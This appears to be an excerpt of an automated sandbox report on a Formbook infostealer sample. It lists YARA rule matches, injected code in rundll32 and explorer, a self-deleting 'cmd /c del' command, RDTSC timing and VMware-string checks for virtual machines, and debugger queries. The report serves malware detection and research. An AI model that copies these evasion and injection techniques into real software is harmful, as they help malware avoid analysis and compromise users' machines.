          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046DDFCE6_2_046DDFCE
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046DE8246_2_046DE824
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046C10026_2_046C1002
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046D28EC6_2_046D28EC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046320A06_2_046320A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046D20A86_2_046D20A8
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0461B0906_2_0461B090
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046241206_2_04624120
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0460F9006_2_0460F900
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046D22AE6_2_046D22AE
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046D2B286_2_046D2B28
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046C03DA6_2_046C03DA
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046CDBD26_2_046CDBD2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0463EBB06_2_0463EBB0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02BBCB996_2_02BBCB99
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02BBC3FC6_2_02BBC3FC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02BBC1AF6_2_02BBC1AF
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02BBC1CB6_2_02BBC1CB
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02BA2FB06_2_02BA2FB0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02BA8C506_2_02BA8C50
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02BA8C4B6_2_02BA8C4B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02BA2D906_2_02BA2D90
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02BBC5446_2_02BBC544
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: String function: 00419F60 appears 38 times
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: String function: 00A0B150 appears 45 times
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: String function: 0041A090 appears 40 times
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 0460B150 appears 35 times
          Source: NdBLyH2h5d.exe, 00000000.00000003.211607404.000000001EF66000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs NdBLyH2h5d.exe
          Source: NdBLyH2h5d.exe, 00000001.00000002.252496199.0000000000AFF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs NdBLyH2h5d.exe
          Source: NdBLyH2h5d.exe, 00000001.00000002.253177072.000000000264C000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameRUNDLL32.EXEj% vs NdBLyH2h5d.exe
          Source: NdBLyH2h5d.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.252981265.0000000000D10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.252981265.0000000000D10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.479518416.0000000002BD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.479518416.0000000002BD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.477763536.00000000003B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.477763536.00000000003B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.220737400.0000000002640000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.220737400.0000000002640000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.251780001.00000000009B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.251780001.00000000009B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.NdBLyH2h5d.exe.2640000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.NdBLyH2h5d.exe.2640000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.NdBLyH2h5d.exe.2640000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.NdBLyH2h5d.exe.2640000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/3@15/11
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 0_2_004041E5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_004041E5
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 0_2_004020A6 CoCreateInstance,MultiByteToWideChar,0_2_004020A6
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5988:120:WilError_01
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeFile created: C:\Users\user\AppData\Local\Temp\nsvE791.tmpJump to behavior
          Source: NdBLyH2h5d.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: NdBLyH2h5d.exeVirustotal: Detection: 20%
          Source: NdBLyH2h5d.exeReversingLabs: Detection: 29%
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeFile read: C:\Users\user\Desktop\NdBLyH2h5d.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\NdBLyH2h5d.exe 'C:\Users\user\Desktop\NdBLyH2h5d.exe'
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeProcess created: C:\Users\user\Desktop\NdBLyH2h5d.exe 'C:\Users\user\Desktop\NdBLyH2h5d.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\NdBLyH2h5d.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeProcess created: C:\Users\user\Desktop\NdBLyH2h5d.exe 'C:\Users\user\Desktop\NdBLyH2h5d.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\NdBLyH2h5d.exe'Jump to behavior
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
          Source: Binary string: wntdll.pdbUGP source: NdBLyH2h5d.exe, 00000000.00000003.216210756.000000001EFE0000.00000004.00000001.sdmp, NdBLyH2h5d.exe, 00000001.00000002.252496199.0000000000AFF000.00000040.00000001.sdmp, rundll32.exe, 00000006.00000002.481925699.00000000046FF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: NdBLyH2h5d.exe, rundll32.exe
          Source: Binary string: rundll32.pdb source: NdBLyH2h5d.exe, 00000001.00000002.253158543.0000000002640000.00000040.00000001.sdmp
          Source: Binary string: rundll32.pdbGCTL source: NdBLyH2h5d.exe, 00000001.00000002.253158543.0000000002640000.00000040.00000001.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeUnpacked PE file: 1.2.NdBLyH2h5d.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,0_2_00401FDC
          Source: 6oxdti6l9qd.dll.0.drStatic PE information: section name: .code
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_0041C8CC push es; ret 1_2_0041C8D3
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_0041925A push esp; retf 1_2_0041925F
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_0041B3F2 push eax; ret 1_2_0041B3F8
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_0041B3FB push eax; ret 1_2_0041B462
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_0041B3A5 push eax; ret 1_2_0041B3F8
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_0041B45C push eax; ret 1_2_0041B462
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A5D0D1 push ecx; ret 1_2_00A5D0E4
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_1_0041C8CC push es; ret 1_1_0041C8D3
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_1_0041925A push esp; retf 1_1_0041925F
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_1_0041B3F2 push eax; ret 1_1_0041B3F8
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_1_0041B3FB push eax; ret 1_1_0041B462
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_1_0041B3A5 push eax; ret 1_1_0041B3F8
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_1_0041B45C push eax; ret 1_1_0041B462
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0465D0D1 push ecx; ret 6_2_0465D0E4
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02BB925A push esp; retf 6_2_02BB925F
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02BBB3A5 push eax; ret 6_2_02BBB3F8
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02BBB3FB push eax; ret 6_2_02BBB462
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02BBB3F2 push eax; ret 6_2_02BBB3F8
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02BBC8CC push es; ret 6_2_02BBC8D3
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02BBB45C push eax; ret 6_2_02BBB462
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeFile created: C:\Users\user\AppData\Local\Temp\nsvE792.tmp\6oxdti6l9qd.dllJump to dropped file
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 0000000002BA85E4 second address: 0000000002BA85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 0000000002BA896E second address: 0000000002BA8974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_004088A0 rdtsc 1_2_004088A0
          Source: C:\Windows\explorer.exe TID: 6540Thread sleep time: -70000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,0_2_00405301
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,0_2_00405C94
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 0_2_004026BC FindFirstFileA,0_2_004026BC
          Source: explorer.exe, 00000004.00000000.233384831.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000004.00000000.233384831.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: explorer.exe, 00000004.00000000.228623277.00000000056A1000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.233670194.0000000008907000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}qqqqqqqqqqqqqq
          Source: explorer.exe, 00000004.00000000.232958897.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000004.00000000.233210221.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000002.492571726.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: explorer.exe, 00000004.00000000.233384831.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000004.00000000.233384831.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000004.00000000.233471521.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 00000004.00000000.228573395.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000004.00000000.232958897.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000004.00000000.232958897.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000004.00000000.232958897.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_004088A0 rdtsc 1_2_004088A0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00409B10 LdrLoadDll,1_2_00409B10
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 0_2_740D1000 Rcxlxosdkhvclf,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,VirtualProtect,0_2_740D1000
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,0_2_00401FDC
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 0_2_02631868 mov eax, dword ptr fs:[00000030h]0_2_02631868
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 0_2_02631650 mov eax, dword ptr fs:[00000030h]0_2_02631650
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A320A0 mov eax, dword ptr fs:[00000030h]1_2_00A320A0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A320A0 mov eax, dword ptr fs:[00000030h]1_2_00A320A0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A320A0 mov eax, dword ptr fs:[00000030h]1_2_00A320A0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A320A0 mov eax, dword ptr fs:[00000030h]1_2_00A320A0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A320A0 mov eax, dword ptr fs:[00000030h]1_2_00A320A0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A320A0 mov eax, dword ptr fs:[00000030h]1_2_00A320A0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A490AF mov eax, dword ptr fs:[00000030h]1_2_00A490AF
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A3F0BF mov ecx, dword ptr fs:[00000030h]1_2_00A3F0BF
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A3F0BF mov eax, dword ptr fs:[00000030h]1_2_00A3F0BF
